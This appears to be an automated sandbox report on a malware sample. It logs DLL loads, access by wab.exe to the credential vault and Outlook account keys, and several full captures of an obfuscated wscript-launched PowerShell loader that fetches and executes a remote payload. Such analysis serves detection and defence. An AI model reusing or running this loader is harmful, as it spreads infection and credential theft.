Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2321744797.00000000071A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2318647454.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdbj source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000005.00000002.2321744797.00000000071A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb= source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapita", "0")
Source: Yara match File source: 00000005.00000002.2332047003.000000000A8C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2331670219.0000000009450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2320148012.0000000005A73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2606411580.000002B7B8242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Upslip)$global:Karo = [System.Text.Encoding]::ASCII.GetString($Halalahs140)$global:Euryaleae=$Karo.substring(325807,29120)<#Overfoeres Solary Operates #>$Garagemester=Andelskapitals
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Sadducees $Dokumentsidernes $Rafaellle), (Attaintment @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ugemagasins = [AppDomain]::CurrentDomain.GetAssemblie
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Turgors)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Gcc, $false).DefineType($Lnindtgtens, $Crescentia
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Upslip)$global:Karo = [System.Text.Encoding]::ASCII.GetString($Halalahs140)$global:Euryaleae=$Karo.substring(325807,29120)<#Overfoeres Solary Operates #>$Garagemester=Andelskapitals
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon 